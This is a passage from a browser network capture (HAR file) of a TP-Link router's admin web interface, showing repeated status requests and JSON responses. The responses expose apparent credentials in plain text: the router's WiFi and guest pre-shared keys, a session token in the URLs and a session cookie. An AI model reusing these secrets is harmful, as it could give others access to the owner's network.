\"2018-07-17T13:10:49.649+03:00\",\r\n \"time\": 944,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 649,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:49.654+03:00\",\r\n \"time\": 1787,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 518,\r\n \"send\": 0,\r\n \"wait\": 752,\r\n \"receive\": 0\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:59.649+03:00\",\r\n \"time\": 976,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:59.655+03:00\",\r\n \"time\": 1789,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": 